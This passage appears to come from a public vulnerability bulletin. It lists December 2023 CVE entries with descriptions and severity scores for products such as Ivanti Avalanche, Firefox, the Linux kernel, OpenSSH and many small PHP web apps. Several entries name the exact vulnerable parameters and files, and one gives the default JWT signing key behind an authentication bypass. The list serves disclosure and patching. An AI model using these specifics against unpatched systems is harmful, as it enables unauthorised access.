ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46257
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46258
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46259
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46260
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46261
support@hackerone.com
ivanti -- avalancheAn unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution.2023-12-199.8CVE-2023-46263
support@hackerone.com
ivanti -- avalancheAn unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remove code execution.2023-12-199.8CVE-2023-46264
support@hackerone.com
ivanti -- avalancheAn unauthenticated could abuse a XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF).2023-12-199.8CVE-2023-46265
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS).2023-12-197.5CVE-2023-46803
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS).2023-12-197.5CVE-2023-46804
support@hackerone.com
ivanti -- connect_secureA vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance.2023-12-167.5CVE-2023-39340
support@hackerone.com
jetbrains -- teamcityIn JetBrains TeamCity before 2023.11.1 a CSRF on login was possible2023-12-158.8CVE-2023-50870
cve@jetbrains.com
kaifa -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator's account, to execute login account's permissions, and obtain relevant information.2023-12-159.8CVE-2023-48392
twcert@cert.org.tw
kaifa_technology -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.2023-12-158.8CVE-2023-48394
twcert@cert.org.tw
kakadu_software_pty_ltd -- kakadu_sdkJPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted the image that is displayed back to the attacker.2023-12-207.5CVE-2023-6562
cve-coordination@google.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49677
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49678
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49679
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49680
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49681
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDate' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49682
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49683
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49684
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTime' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49685
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49686
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtPass' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49687
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtUser' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49688
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'JobId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49689
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'WalkinId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49690
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'id' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5007
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5010
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursename' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5011
help@fluidattacks.com
help@fluidattacks.com
kodcloud -- kodboxA vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.2023-12-169.8CVE-2023-6848
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud -- kodboxA vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.2023-12-169.8CVE-2023-6849
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.2023-12-169.8CVE-2023-6850
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.2023-12-169.8CVE-2023-6851
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.2023-12-169.8CVE-2023-6852
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.2023-12-169.8CVE-2023-6853
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kylinsoft -- hedron-domain-hookA vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-217.8CVE-2023-7025
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lfprojects -- mlflowPath Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.2023-12-158.1CVE-2023-6831
security@huntr.dev
security@huntr.dev
linux -- kernelA race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.2023-12-217.8CVE-2023-6546
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelA heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation. A perf_event's read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.2023-12-197.8CVE-2023-6931
cve-coordination@google.com
cve-coordination@google.com
linux -- kernelA use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.2023-12-197.8CVE-2023-6932
cve-coordination@google.com
cve-coordination@google.com
linux -- linux_kernelA use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.2023-12-187.8CVE-2023-6817
cve-coordination@google.com
cve-coordination@google.com
cve-coordination@google.com
cve-coordination@google.com
m-files_corporation -- m-files_serverLack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.2023-12-207.5CVE-2023-6912
security@m-files.com
majordomo -- majordomoMajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.2023-12-159.8CVE-2023-50917
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
master_slider -- master_slider_proDeserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.T his issue affects Master Slider Pro: from n/a through 3.6.5.2023-12-207.1CVE-2023-47507
audit@patchstack.com
mindsdb -- mindsdbMindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server.2023-12-229.1CVE-2023-50731
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
misp -- mispapp/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.2023-12-159.8CVE-2023-50918
cve@mitre.org
cve@mitre.org
mlflow -- mlflowPath Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.2023-12-187.5CVE-2023-6909
security@huntr.dev
security@huntr.dev
moxa -- iologik_e1200_seriesA Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.2023-12-238.8CVE-2023-5961
psirt@moxa.com
mozilla -- firefoxTypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121.2023-12-198.8CVE-2023-6866
security@mozilla.org
security@mozilla.org
mozilla -- firefoxMemory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121.2023-12-198.8CVE-2023-6873
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- firefox_esr/thunderbirdA use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6.2023-12-198.8CVE-2023-6862
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsThe WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6856
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsFirefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6858
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsA use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6859
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsThe `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6861
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsThe `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6863
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsMemory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6864
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mr-corner -- amazing_little_pollAuthentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the "lp_admin.php?adminstep=" parameter.2023-12-209.8CVE-2023-6768
cve-coordination@incibe.es
multisuns -- easylog_web\+_firmwareMultisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.2023-12-159.8CVE-2023-48388
twcert@cert.org.tw
multisuns -- easylog_web\+_firmwareMultisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service.2023-12-159.8CVE-2023-48390
twcert@cert.org.tw
multisuns -- easylog_web\+_firmwareMultisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48389
twcert@cert.org.tw
navidrome -- navidromeNavidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome's subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key "not so secret". The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don't protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2.2023-12-218.6CVE-2023-51442
security-advisories@github.com
security-advisories@github.com
netentsec -- application_security_gatewayA vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability.2023-12-179.8CVE-2023-6903
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
netgear -- wnr2000_firmwareA Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.2023-12-159.8CVE-2023-50089
cve@mitre.org
cve@mitre.org
nxfilter -- nxfilterA vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-189.8CVE-2023-6905
cna@vuldb.com
cna@vuldb.com
nxfilter -- nxfilterA vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-178.8CVE-2023-6904
cna@vuldb.com
cna@vuldb.com
octokit -- appoctokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3.2023-12-157.5CVE-2023-50728
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openbsd -- opensshIn ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.2023-12-189.8CVE-2023-51385
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
openimageio -- openimageioA vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service.2023-12-187.5CVE-2023-3430
secalert@redhat.com
nvd@nist.gov
panasonic -- control_fpwin_proStack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file.2023-12-197.8CVE-2023-6314
product-security@gg.jp.panasonic.com
panasonic -- control_fpwin_proOut-of-bouds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file.2023-12-197.8CVE-2023-6315
product-security@gg.jp.panasonic.com
peazip -- peazipA vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release.2023-12-177.8CVE-2023-6891
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
perl -- perlA vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.2023-12-187CVE-2023-47038
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
phz76 -- rtspserverA vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-179.8CVE-2023-6888
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
projectworlds -- online_voting_system_projectOnline Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-48433
help@fluidattacks.com
help@fluidattacks.com
projectworlds -- online_voting_system_projectOnline Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-48434
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- leave_management_system_projectLeave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setearnleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-218.8CVE-2023-44481
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- leave_management_system_projectLeave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setsickleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-218.8CVE-2023-44482
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'ch' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45115
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'demail' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45116
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'eid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45117
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'fdid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45118
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'n' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45119
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'qid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45120
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'desc' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45121
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'name' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45122
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'right' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45123
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'tag' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45124
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'time' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45125
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'total' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45126
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'wrong' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45127
help@fluidattacks.com
help@fluidattacks.com
